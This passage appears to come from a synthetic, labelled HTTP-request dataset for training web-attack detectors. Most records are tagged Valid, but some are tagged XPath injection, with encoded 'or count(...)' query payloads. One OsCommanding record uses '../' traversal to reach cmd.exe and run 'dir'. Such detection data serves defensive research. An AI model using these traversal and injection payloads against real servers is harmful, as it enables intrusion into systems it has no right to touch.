nstMhc=sC3TJtvKD392&nioErthodtsa=thtaccesae&edntgsnhnher2eT=CrmR&nh=<Tn&ei4Esoft=6338214699

End - Id: 4329
Start - Id: 35592
class: XPathInjection
GET /xN_zQoG/uw/f_gVPAJsd/iNssnt/adzIlfI3AN5IvfQ/oYqVEu9q86yL51/6u341IrNE/nge.js?xnra5mr5wS=anaahhic%27++or+++++%28i+++%3C++++count%28cedt%2Fchild%3A%3Atext%28%29%29+++++and++++j+%3C++++count%287nsobe%2Fchild%3A%3Acomment%28%29%29+++++and+++++k++++%3C++count%28ae%2Fchild%3A%3A*%29+++%29++or+++%27teelmy2%27%3D++++%27++gixh%27+++or&aiahdie58ttN=e2SheraioutOtnqanw&cmRolgdb=9380968&lrar=86306 HTTP/1.0
Host: 243.94.186.154
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: identity;q=0.6, identity, gzip;q=0.5, compress;q=0.6
Accept-Language: rgioq4o-n
Cache-Control: max-stale
Client-ip: 146.199.243.126
Cookie: oreeinzeto4r8e=eoytn;gthmeep=ptdsId;triSOciurzkett=o-OJqtDGNqA;nhuqx=0;9rteazee=tf-J.i5fA;uvVqmc=Ose
Cookie2: $Version="49"
Date: Sun, 11 Mar 07 14:57:30 UTC
ETag: "we9G3D14NMFQAmuCN"
Expect: atlide=oHonl
From: keef8S@qicoiNe.be
If-Modified-Since: Sat, 24 Jun 06 20:37:15 UTC
If-Unmodified-Since: Wed, 07 May 08 20:46:29 GMT
If-Match: "ShnD2NkYPCwI-Pnxb"
If-None-Match: "rwOo.Tuonx4ayEEa"
If-Range: *
Max-Forwards: 44
MIME-Version: 4.7
Pragma: o='aeU'
Proxy-Authorization: NTLM b2RXcmx2M25sdGE2b3dvcmVIaGxuZWh5b2lzdGlXWGRvdnlvUm0xZXQxbU8zYm0=
Authorization: Digest algorithm=MD5-sess
Range: 1278-6
Referer: http://www.m78echn.be/mzldxu/aernenmz/derjhcO.dll
TE: trailers,trailers,chunked
Trailer: Accept-Language
User-Agent: lailepara
UA-CPU: 68000
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 468x391
Via: 6.9 www.pa3eVo.css, nrop4/9.3 www.aeas.gif:883, 1.7 www.yfewB.jpeg
Transfer-Encoding: compress
Upgrade: anfbe/0.9, m2ntt/2.0
Warning: 204 197.17.40.24 "eS4aShneveaeoeqAni" "Sun, 06 Nov 05 19:18:19 CET"
X-Forwarded-For: 245.111.237.199
X-Serial-Number: 65275952070459353
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35592
Start - Id: 2704
class: Valid
GET /tiaTejtArlurmdi/nx5_Nc5bo@4GL3/apqm6N4oxdNBNrVk1FJp/o.s6@EcGXUxt7kodvB/n@qggYF8MJOr/gAa8NeOde585nn45d/orjTaeklogm5ulfey/i-4Aq0.jpg?imonrrsAtahyaso=bhNlibytwirN&atetnaooANh=1236&RK1v8djz=7664045&tcvrSoSstsnlvng=9577208&ewry9Whhuin=erm%24A&oJ=t%26m2pretmHs&qS=s&uaa9wus0lonlG=%3F&3yED=7&efgqotjlrzl=02&nodaatab=ymDct0etcod9ntoble&rusHaEeT=225556 HTTP/1.1
Host: www.hglwkttwg.it
Connection: oI9rodu
Accept: text/*;q=0.8, application/zip;q=0.0, video/*;q=0.8
Accept-Charset: iso-8859-5;q=0.4, cp-950;q=0.1, windows-1255, x-mac-japanese
Accept-Encoding: compress;q=0.8, identity
Accept-Language: *;q=0.8
Cache-Control: max-age=803
Client-ip: 207.44.51.211
Cookie: atllfeoenk=Ts5lj;f-c@ZIzst=aftpo
Cookie2: $Version="867"
Date: Sat, 16 May 09 22:58:42 GMT
ETag: "tItqd5tA_J@DpVg"
Expect: 100-continue
From: Dhellnoh@bmtei.net
If-Modified-Since: Wed, 04 Mar 09 16:20:27 CET
If-Unmodified-Since: Tue, 12 Aug 08 03:33:59 CET
If-Match: "G8VrFJf4-waUmKmp"
If-None-Match: *
If-Range: *
Max-Forwards: 0551
MIME-Version: 3.3
Pragma: drnap='ta'
Proxy-Authorization: hnknte 6dhe=ailltedl
Authorization: Digest response="f9aca9ea1aECeF88E63499EceBA5960f"
Range: 800-526712,0803-
Referer: /Lue7/cl60e/nHsnxs/te7rruo/s9or.html
TE: trailers,deflate
Trailer: Host
User-Agent: lh7ynrh (wmKNwQUw; aFIbMT3.; 06INij3; v79xJ-8Eug)
UA-CPU: 68000
UA-Disp: 5234,7781,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 486x934
Via: EeEiDe/3.5 34.223.234.164
Transfer-Encoding: identity
Upgrade: foys/2.8, sSboa/7.3, alt/9.7, arhxe/9.3, g5ee4a/9.9
Warning: 618 www.isvroab.html "hmysacdeseenneluAtm" "Fri, 02 Jun 06 09:20:31 CET"
X-Forwarded-For: 45.109.116.108
X-Serial-Number: 8025046120
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2704
Start - Id: 8707
class: Valid
GET /i4Bch551/ag1to0eeegn/xHa8YKrAg2W/oje2ilo9ntPhupkr.php4?mEF-VWHv=q+e0atc+o&hkrrif=ey7&M3PLUHqGJinsert=7fOiehcanteop+&siw=%2B4%3AdWie2lwnyre&oefue4Z=%27Aui%3Bro5shfh&pceo3tr=stmpyexr58%27wSuj HTTP/1.1
Host: www.ngEhdeie.biz
Connection: close
Accept: */*;q=0.3
Accept-Charset: windows-1253, x-mac-roman, us-ascii;q=0.3, utf-8;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: 9sac-sbr3, eete-9d;q=0.2, e-e, akix-soyb;q=0.7
Cache-Control: min-fresh=3
Client-ip: 247.33.54.62
Cookie: aohsc7od4=childJg;XCxUwBbYYX=98816537;2ahisusari=tw;lot3mu4=34406867
Cookie2: $Version="1"
Date: Fri, 13 Jun 08 12:56:54 UTC
ETag: W/"iBMMyw3mtjYcJdHG"
Expect: Satnxen=Eehyoe;ede4slwc
From: mSidnli@oitt.fr
If-Modified-Since: Thu, 08 Sep 05 15:26:38 GMT
If-Unmodified-Since: Wed, 11 May 05 08:19:57 GMT
If-Match: "Nh3RdiV-Hg3_7WWup7Cq"
If-None-Match: *
If-Range: Tue, 16 Dec 08 16:52:17 UTC
Max-Forwards: 660
MIME-Version: 3.6
Pragma: ugedd=dorh
Proxy-Authorization: nizt soee=nd5rr
Authorization: Basic cGFlZToxZVRl
Range: -1251,-8,78356-
Referer: /rtidigi.wav
TE: trailers,gzip;q=0.7,gzip;q=0.9
Trailer: TE
User-Agent: Mozilla/1.5 (Windows; U; Windows NT 0.3; 8a-ra; rv:2.9.2) Gecko/32691145
UA-CPU: PowerPC
UA-Disp: 232,8608,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 650x4378
Via: 7.1 www.sitgeysd.jpeg, 5.9 www.mt4knP6e.js, HTTP/2.9 www.stes.html
Transfer-Encoding: identity
Upgrade: t6hhg/7.3, iEEkud/1.6
Warning: 090 www.cqnn9nrn.gif "zeetdnEmqqu" "Sat, 30 Dec 06 17:20:47 CET"
X-Forwarded-For: 142.15.151.110
X-Serial-Number: 0604736
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 8707
Start - Id: 44348
class: OsCommanding
GET /images/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.lzqu.cz
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: *;q=0.2
Cache-Control: min-fresh=1
Client-ip: 253.153.154.72
Cookie: ei0seIzt=95766546;lrSv=6458
Cookie2: $Version="2"
Date: Sun, 05 Jun 05 10:48:17 UTC
ETag: "RSp4zdzXB1AJ_l1"
Expect: 100-continue
From: oehrc@o8se.com
If-Modified-Since: Tue, 27 Apr 10 13:24:31 GMT
If-Unmodified-Since: Fri, 01 Dec 06 03:19:01 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 13 Mar 10 05:58:32 UTC
Max-Forwards: 780
MIME-Version: 5.1
Pragma: Eiilnn='tisHs'
Proxy-Authorization: iHauOk iIeethi7=3ndhh
Authorization: a9cb rpta8oc=nteya
Range: -61939,-108
Referer: http://aaMrdm.de/i0ze/r4tHxt/htpuiet.html
TE: gzip,gzip
Trailer: Max-Forwards
User-Agent: Mozilla/3.3 (Machintosh; U; PPC 6.9; oE-ts; rv:8.2.7) Gecko/03758303
UA-CPU: x86
UA-Disp: 5843,217,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 673x399
Via: 3.3 www.nea5ttS.css, sywoe/1.4 19.129.86.156:6, 8.9 73.48.109.8
Transfer-Encoding: deflate
Upgrade: 4et/8.8, is0/1.7, mseCwu/8.0
Warning: 732 www.nidnAqoh.js "estaore5gordngon0ar" "Fri, 26 Nov 04 13:07:04 GMT"
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 7714827508800
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44348
Start - Id: 28024
class: Valid
GET /rIheah9salmo/eiFPOdgzHAMMN/updateVteRjyXU_include/pYG-K7g/UoropenLc6ZFN238c/by3676GBCllEmetam/9J9Yuvvz4u8wGg-/xobjectJNEz.6JMyIYQ/f_ElinkUYor/b8lhBi7.50U12Eis@O/cEEYnQeAixQ2xr-sQYw.sh?f8v=26984991&8tos=138925638&ufivfcftne7Ee=3&usrkSncopy2MOY7j=31722183&olebetct=nrslrwO&_de2XJ9w=37642822&egcIfz=89TOf&lce8uw6=1498897982&eaea=r9h0a%3Btmpaut1l5ge&xNE=u%3Bsp HTTP/1.0
Host: www.9hdhPqhilw.be
Connection: acrsyps
Accept: video/mpeg, text/*, audio/basic;q=0.9
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 137.59.46.109
Cookie: ichildhiUiWks=uassTt6euwqebw8;F5FRpasswd0LNc8=maoaE0rnAhV;zPwnJscriptsA6=629832;agmto=arsi;9yTsc8E=ldA@;L3RxIinputIFk=54023784
Cookie2: $Version="9"
Date: Fri, 09 Sep 05 18:55:29 GMT
ETag: W/"2NFr31fppB4db1hu7"
Expect: 100-continue
From: gu9cDaia@ar6it9.st
If-Modified-Since: Sat, 05 Mar 05 16:56:10 CET
If-Unmodified-Since: Thu, 18 Feb 10 19:31:30 CET
If-Match: *
If-None-Match: *
If-Range: "Rlp84iFJJU4bYn34D6"
Max-Forwards: 3562
MIME-Version: 5.2
Pragma: Ensl=auztg
Proxy-Authorization: NTLM QTRjYWFhd3RhNHlnT2l0aWNvaWkxc3JoVG9ndGFhaWRscjhySGF0aG90
Authorization: Basic b2ViQTpvcnJhZXQ=
Range: 423138-8,594351-,3-756362
Referer: http://www.irebtra9.st/lctc/ama9dtf/nHevOeNn/ueffb/weoueg.jpg
TE: trailers,gzip,deflate
Trailer: If-Range
User-Agent: Mozilla/3.2 (compatible; 2snr; Open BSD i586; ra65)
UA-CPU: PowerPC
UA-Disp: 6297,097,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4477x7117
Via: HTTP/9.6 www.ruaei.jpeg
Transfer-Encoding: emot3
Upgrade: 9htud/6.5, uadanh/4.9, euxd/5.9
Warning: 759 www.rcgyueh.tiff:5 "wolidasoknadsaeahf" "Sun, 27 Jul 08 14:28:37 UTC"
X-Forwarded-For: 83.205.211.13
X-Serial-Number: 45504056220
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28024
Start - Id: 2240
class: Valid
GET /IDCX/aJu6zbvCRpYpdJvm_Uvn/a@00.Bj4RqaWxoGIBFbp/iAj/tbfLgm@zEr3rcnLGIHkN/Asnrrevhoess/cesennadePorhsearo/aartsdhtizytebde/vl15Auoem@A@L/q27GFEGt6j8YyvQ.bin?m@6h9=+thdenuha+%3Dlsrhe&isvgsoah=rseol1ih79aafia&reSrnscbhi=73929&eozehtitacHlt=qmsin%3Ciechouewindow.openuy&o2aat7I=3PIAOHNw62SN&losxcas=asejtdfewcnwuaeler&hln=3tbwU HTTP/1.0
Host: www.9orlHrn.be
Connection: close
Accept: */*
Accept-Charset: x-mac-turkish, windows-1250;q=0.5, windows-1254;q=0.5, x-mac-arabic
Accept-Encoding: 
Accept-Language: im-lj;q=0.3, Y9i0-bottnr;q=0.5, fstdeS-em
Cache-Control: no-cache
Client-ip: 124.21.115.181
Cookie: yMJnrU=;csewindow.openyt:oe';yteitis7l1attz=7133568344;te=6;tlf6aawb6euwr2t=eicas8edhnj;regU=dr3nsuilag;lxotiqiIhln=yn
Cookie2: $Version="05"
Date: Sat, 18 Aug 07 07:28:40 GMT
ETag: W/"Ghx9w1vzuBKoUCK.u"
Expect: upeihHe
From: oniNcb@l92ecsed.it
If-Modified-Since: Thu, 30 Oct 08 08:01:03 UTC
If-Unmodified-Since: Mon, 12 Apr 10 10:50:31 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 31 Mar 07 15:04:19 CET
Max-Forwards: 285
MIME-Version: 7.3
Pragma: t=aaiiogib
Proxy-Authorization: Basic c2dlaGpvOm9jbXh0d2Vy
Authorization: rd4r thc9=il9e
Range: 98793-,-49003,-71607
Referer: /nrrEndi2/otn6nl/eUStwn/kr50/3dNfia.bin
TE: chunked
Trailer: If-Modified-Since
User-Agent: r@Wkpjn2n http://www.edrn.org
UA-CPU: StrongARM
UA-Disp: 006,895,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 3153x522
Via: 4.8 171.231.199.206, 3.2 www.s3qeaihh.png
Transfer-Encoding: identity
Upgrade: uadh/3.9, esa/6.4
Warning: 141 102.221.143.25:60740 "vgrreunklthugbStknar" 
X-Forwarded-For: 211.5.1.135
X-Serial-Number: 92243859196
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 2240
Start - Id: 11482
class: Valid
GET /gionuaoy/wH4j0x/lx/rWlyMFBXJdNiP6/oe/xOFXWNLOXv.jpg? HTTP/1.0
Host: 216.237.53.182
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 170.41.229.75
Cookie: dlmzxtAsvsgtT=pBwEJKGGIB.T;ojd=01935;8blrsr9=ipK;flmalmc3s1hcm=Elmoesntm3ha3nf
Cookie2: $Version="2"
Date: Sun, 22 Oct 06 12:02:42 CET
ETag: W/"uok78NCd1DvlIieuna"
Expect: 100-continue
From: oohw@halud.org
If-Modified-Since: Thu, 11 Dec 08 01:37:21 GMT
If-Unmodified-Since: Fri, 16 Feb 07 05:21:00 GMT
If-Match: "Bm42LA0k322dlfU2tSf"
If-None-Match: *
If-Range: "G-XSd-hRZ50ZFLIE"
Max-Forwards: 37
MIME-Version: 6.0
Pragma: reem='yahionlk'
Proxy-Authorization: Digest qop=ki3naiu
Authorization: Digest algorithm=MD5
Range: -517746,13-
Referer: http://www.8rdan.st/nraa2aed/lsefcxcn/vaerivon.doc
TE: deflate;q=0.6
Trailer: From
User-Agent: Mozilla/5.4 (X11; U; SunOS sun4u 3.1; rh-nq; rv:3.0.1) Gecko/21415162
UA-CPU: PowerPC
UA-Disp: 9055,045,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9366x217
Via: nt6/1.5 20.236.131.97, 0.0 www.kusw.htm:2741, 3.0 12.118.206.209
Transfer-Encoding: identity
Upgrade: ssb/3.4, dhoi/2.7, Ha2qy/1.5
Warning: 532 www.guwhhej.jpeg "fEoeeynUyaan2" "Sat, 12 Apr 08 24:22:20 UTC"
X-Forwarded-For: 54.109.53.253
X-Serial-Number: 684447475496
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11482
Start - Id: 19101
class: Valid
GET /jR7/oBmbQ_obAwV4DpI/eBgUX_4d/rH6jRndUztU7fn/8I3RUYyKP3zsk.c/ricrtltl9eex/f6yzT4p2RgJ/ec0I.U/lIuW/eleE/MY.asp?mcalgshwct=rFGBrRDx&oz=bslC4el3+%28%3Abtels&pEdpceus=970&qDWTBlqW=o1Bshefdmu&OosystemsFo7G=miayr%3Ail&eVrnfieoeynyr=saoetqd6j3aaeu0eiA&oflhie7eswte=29 HTTP/1.1
Host: 185.76.225.39
Connection: close
Accept: application/*;q=0.8, image/png;q=0.6
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.8
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 189.63.11.240
Cookie: rtns=190575;ns2qs97alotSia=Zant39ptYdlianqY;qy9gir75m=Stebxf;gtn=1033025;fmych=tttlietgiESgnzs;qoHJa=cbRpsh1-rl iObwwinnt91h
Cookie2: $Version="47"
Date: Tue, 14 Apr 09 20:00:37 GMT
ETag: W/"ybTiqqPUXJhv01KIDA9"
Expect: 100-continue
From: dvelvane@qhwetaoqup.st
If-Modified-Since: Wed, 28 Apr 10 18:32:02 UTC
If-Unmodified-Since: Mon, 09 Jul 07 12:08:58 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 17 Jan 08 03:48:20 CET
Max-Forwards: 990
MIME-Version: 1.0
Pragma: tsf='cedes'
Proxy-Authorization: Basic M3A4M2EyOml0aHR0N2Nh
Authorization: Digest realm
Range: 2-,-0,87927-654
Referer: http://hecssr.gov/rrEathi/ongindrw/MqeSnD/iwie.pl
TE: gzip;q=0.0,trailers,gzip;q=0.7
Trailer: Range
User-Agent: Mozilla/3.6 (Windows; U; Windows NT 7.9; br-et; rv:2.2.9) Gecko/84850245
UA-CPU: x86
UA-Disp: 2540,4307,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 315x9224
Via: 1.5 www.isel.gif, hwdesh/9.6 www.te4aachs.css
Transfer-Encoding: gzip
Upgrade: uh18/7.6, a1w/5.6, ydmr/7.2, o5j/2.9, rmIai/6.0
Warning: 947 www.RRed.htm "sieaizuOuewergir" "Sun, 14 Nov 04 07:40:45 UTC"
X-Forwarded-For: 31.76.137.109
X-Serial-Number: 548655567433466
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19101
Start - Id: 3926
class: Valid
POST /hFmnX/hSNG_Y98hJYiE/uJ4BV3d-FDOdQ0lwu/owuit9ii7aafe1enc/So1heeuetugushaRsee.dll? HTTP/1.1
Content-Length: 123
Content-Language: rhn,ilthn8e,Ua94gf
Content-Encoding: compress
Content-Location: /nneYseb.php
Content-MD5: VDVtczdhb3piUVlvblN2OA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 09 Oct 06 02:02:46 UTC
Last-Modified: Fri, 15 Jun 07 12:16:54 GMT
Host: 190.64.204.193
Connection: db6zee
Accept: */*;q=0.1
Accept-Charset: iso-8859-15;q=0.6, big5;q=0.6, x-mac-chinesetrad
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-stale
Client-ip: 116.169.166.51
Cookie: pp660iEeg=3504
Cookie2: $Version="0"
Date: Wed, 27 Apr 05 02:36:40 UTC
ETag: W/"6pS4._@YpuZM1-aKk"
Expect: 100-continue
From: piNm@lsgw.org
If-Modified-Since: Thu, 30 Jun 05 19:27:27 CET
If-Unmodified-Since: Wed, 16 Jun 04 07:51:48 UTC
If-Match: *
If-None-Match: "AFCaGr@.4yupbpy1g"
If-Range: ".B-vA34q4PsKns0SwHzb"
Max-Forwards: 460
MIME-Version: 6.3
Pragma: tlt='wIhdfu5'
Proxy-Authorization: Digest response="590dDbbEC4BDadBA96a45FdEb203AD5E"
Authorization: Digest uri=/tTPr/6aa1/yagf.msf
Range: 378-
Referer: http://tfeg9o.ch/ArtH5oh/nni8e/vatodv/atyaIsnh.tiff
TE: gzip;q=0.5,trailers,chunked
Trailer: Cache-Control
User-Agent: Mozilla/6.1 (compatible; sviseIu; WinNT; tslo; atrdond; boei)
UA-CPU: Sparc
UA-Disp: 905,734,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 698x5679
Via: 1sy3g/2.8 www.atnn.jpg, uHh/5.1 31.151.229.9:12
Transfer-Encoding: gzip
Upgrade: nake/5.5
Warning: 884 93.144.26.206:701 "e5urtc8hhy7ie8rxs" 
X-Forwarded-For: 250.222.244.133
X-Serial-Number: 40075996099747963
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

Aaae2gbtyie=behiobIt&orqifg= fn8ena$eftpEEd\?&mnrhdet30se=wF1R9qa&ezx3r5=f.p3DTSRhu-T&11nodem.=9&uaSE7siiim=nsrostdin

End - Id: 3926
Start - Id: 48747
class: XPathInjection
GET /7eenMR0cabtee/Eii2/eZj/zDFFW98EH5l@4/aEflej06udHafoSohE/.DHGZ.swf?zeAcQtwq=qSreeaQvo&3ti=01891+++++or++++1%3C+++meopy%2Fi%2FSdyl%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D494%5D++++or+543%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27 HTTP/1.1
Host: 154.30.247.37:80
Connection: close
Accept: video/mpeg
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 52.241.218.21
Cookie: crrulbednu=482193;7foisn9u94lCsn=iNehe;rhsar=drac
Cookie2: $Version="29"
Date: Thu, 25 Feb 10 23:04:26 UTC
ETag: W/"996BwVNCkYJYl76n"
Expect: 100-continue
From: lYglyt2@7smfrhi.org
If-Modified-Since: Tue, 06 Jan 04 06:57:16 GMT
If-Unmodified-Since: Thu, 13 Mar 08 16:16:55 GMT
If-Match: "US1-Zp1h_hmGvBW0"
If-None-Match: *
If-Range: Sun, 09 Sep 07 09:32:50 CET
Max-Forwards: 94
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Digest opaque="dmhss"
Authorization: Digest response="3F495F6Cff6AaA2A8BF5EDecF4ef2eF0"
Range: -506333,18704-151605
Referer: /s17fdouh/5ycehb/6T2so.swf
TE: gzip,gzip;q=0.7,chunked
Trailer: Via
User-Agent: oJy-pnUJ http://www.Einsqi.net
UA-CPU: MIPS
UA-Disp: 383,7036,16
UA-OS: WinNT
UA-Pixels: 9907x836
Via: HTTP/4.4 www.feeoenhe.shtml, FTP/0.0 www.e6fED.jpg, 5.7 88.118.176.231
Transfer-Encoding: gzip
Upgrade: asd/1.5, Ttn35k/8.5
Warning: 110 www.nsio.html "gbuonm" "Sun, 29 Jul 07 09:27:30 CET"
X-Forwarded-For: 55.147.33.124
X-Serial-Number: 265535777881770929
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48747
Start - Id: 27410
class: Valid
GET /h5j.bin? HTTP/1.0
Host: 143.252.79.205
Connection: keep-alive
Accept: application/postscript
Accept-Charset: windows-1254, iso-2022-jp;q=0.3, macintosh;q=0.7, x-mac-greek;q=0.9, cp-936;q=0.0
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 63.50.146.180
Cookie: eoes1zuN1mnr=tNal;ecOe8tzAwoa=fkGmQPTM53W2;usoroeNeragcb=er ;FPsystem3fsSallyHNf=kmooeyc;sUehDi3omia=En:ae>aidp=fa2dropftpgsfyboot.ini
Cookie2: $Version="5"
Date: Fri, 16 Dec 05 05:35:43 UTC
ETag: "90lNt1MOgJNu@cgl.25"
Expect: 100-continue
From: s3show@itrbi0a.de
If-Modified-Since: Sat, 10 Dec 05 08:44:15 GMT
If-Unmodified-Since: Thu, 31 Jan 08 03:04:46 CET
If-Match: "rwHKfXaN_FnHEjUAU2so"
If-None-Match: "6BAIrK3J1DTiZ7bAazEy"
If-Range: "tpdt.Hmhgi6LhGfGQ"
Max-Forwards: 9
MIME-Version: 1.3
Pragma: Ettj='bU'
Proxy-Authorization: NTLM bmFvYWVpdW4wZHJsZG9FaXFoZWFybTRSbmFnc05lYzJwYW4=
Authorization: NTLM U3lhY2FpdUF5d3JIa3N5b2hvbVhocmd5dmlldHpyN2Ric2Vib2Q=
Range: 72281-,-99334,2815-
Referer: /qooci/Miiink.rar
TE: trailers,deflate
Trailer: Host
User-Agent: Mozilla/5.6 (Machintosh; U; PPC Mac OS X 8.4; tu-Ps; rv:3.0.2) Gecko/43622891
UA-CPU: MIPS
UA-Disp: 7900,686,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 9698x542
Via: HTTP/7.1 134.164.218.32
Transfer-Encoding: compress
Upgrade: anhok/6.7, tgihE/5.8
Warning: 042 127.96.173.181 "nHr5eer8soa9adtcmmH" 
X-Forwarded-For: 39.176.137.22
X-Serial-Number: 012150343166763006
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27410
Start - Id: 15678
class: Valid
GET /fiprzTg_/bkNzud_mbCuqQNKzOd.nsf?ithohf=47829683&59n3etd2oleosra=yIK2sQE&Ze_qUl0f9=03&PqunionUwaw=7055&mseee0csn6koeo=65790580&@childJHqUxCscriptW=939911&za48=wRhpNqrdErW7&M6.-l-ZascriptfSl=%3Dm%24o7rne%3Bhof%5C&ematgbeulrfEp8=rte3allNulnph-nsdde&on3n=979&aSa=34&nh2eS6eUcr=po3gTegua14o&VZ2rbLhw0kO=r HTTP/1.0
Host: www.viRkn5us.org
Connection: keep-alive
Accept: video/quicktime;q=0.4, image/*;q=0.1, application/*
Accept-Charset: iso-8859-7, iso-10646-ucs-2;q=0.0, gb2312;q=0.0, euc-kr;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=279
Client-ip: 126.84.214.50
Cookie: efl2e5es=mmnXLX_f
Cookie2: $Version="3"
Date: Sun, 14 Sep 08 10:23:11 GMT
ETag: "MYki.uof4Jf1o_crx"
Expect: 100-continue
From: aidedtls@ci4kCcst.biz
If-Modified-Since: Sat, 20 Mar 04 24:10:40 CET
If-Unmodified-Since: Wed, 18 Aug 04 15:48:00 CET
If-Match: *
If-None-Match: "DGMgI_Pk2l8UAOUyCRoc"
If-Range: Thu, 15 Jan 04 12:26:39 GMT
Max-Forwards: 7
MIME-Version: 6.6
Pragma: nr='xs1'
Proxy-Authorization: dtsewm peesp=dtehnigo
Authorization: HnDe Itrtna=rhja
Range: 3134-504
Referer: /pn1sRu/sdoeV7c/linlhe/lrndc.tiff
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/1.2 (Machintosh; U; PPC 6.0; td-dP; rv:1.6.0) Gecko/09808855
UA-CPU: StrongARM
UA-Disp: 9331,266,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2296x8201
Via: 7.6 www.rzia.gif, HTTP/2.3 www.oLilAyEi.jpg
Transfer-Encoding: deflate
Upgrade: nIttOn/7.6, s3nl/3.5, 90l/3.3, yneaI/5.5
Warning: 358 www.IqahRx.css "teexfzsw" 
X-Forwarded-For: 255.121.54.148
X-Serial-Number: 4254681
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 15678
Start - Id: 19652
class: Valid
GET /rgdsgktdSeaedrlEx/3.K/Itoar/apU/bPRUD6xkE/5vc1IHjdjy/db/lxtc8Gjd62d/eNW-s2MiI9tmXfHwN/m7yeae.css?mlachijerHaM=hddodoBt&csa=ae2poefEbbshinY4b&lmdrmismtleioq=Airobjecteot&oto4htHiah5o=70&ebsaelNa=ro&m3meta6BWi=ehd&LHniamy=fbzaaheol3Hhdn&irwdcarc=47695&cjwget8wx0aKenep=hhomearseoHnNhn+m7Aexect&m6e=163598&etnt2zexlfhemne=e4binplMdhe&p1ehhewneeh=ea912ayq&Rsahaxes=6&tnsgosopylIf=lduoltdhyldmm HTTP/1.0
Host: www.uthie.ch
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: A3Ilco-v3ll4Ht;q=0.0, iC2ns7-a6yt7w;q=0.3, omdla-Ed9, ta26-2tht;q=0.3, le-meRomc;q=0.1
Cache-Control: max-age=32
Client-ip: 56.112.237.174
Cookie: 0e=ObrdXtk
Cookie2: $Version="150"
Date: Sun, 08 Feb 04 19:32:29 CET
ETag: "zomKoLVgTnxloO."
Expect: ftAt=ab3meor;c4rYeIvh=Peewep
From: sbhe@iho1e.be
If-Modified-Since: Mon, 25 Jun 07 06:16:39 UTC
If-Unmodified-Since: Mon, 14 Jan 08 19:42:33 UTC
If-Match: "9gBXlsj_@s@HDOma0"
If-None-Match: *
If-Range: Wed, 06 Jun 07 17:04:29 UTC
Max-Forwards: 5661
MIME-Version: 6.3
Pragma: beezof='k'
Proxy-Authorization: NTLM YVRzb3BlZ2lBc2hhb3Rwb3JwZ2hpZTNzQW5wQWg0b25kV3NpdmlleWRl
Authorization: Kaet2m oul9=KCcUSga
Range: -382
Referer: http://www.istHst.be/ptaIh/owrrbdbt/htntfra/asll/eobr.jpg
TE: trailers,gzip;q=0.6
Trailer: Accept-Language
User-Agent: Mozilla/4.0 (Windows; U; Windows NT 9.5; 1l-iM; rv:4.6.1) Gecko/28342791
UA-CPU: x86
UA-Disp: 4810,493,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 106x833
Via: FTP/5.4 8.228.144.27, FTP/5.9 180.238.63.8, FTP/7.8 www.obmj.jpeg
Transfer-Encoding: identity
Upgrade: eShaio/0.4
Warning: 485 208.128.255.74:96 "ouromuettw" 
X-Forwarded-For: 44.241.139.6
X-Serial-Number: 46232524708716277556
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19652
Start - Id: 28153
class: Valid
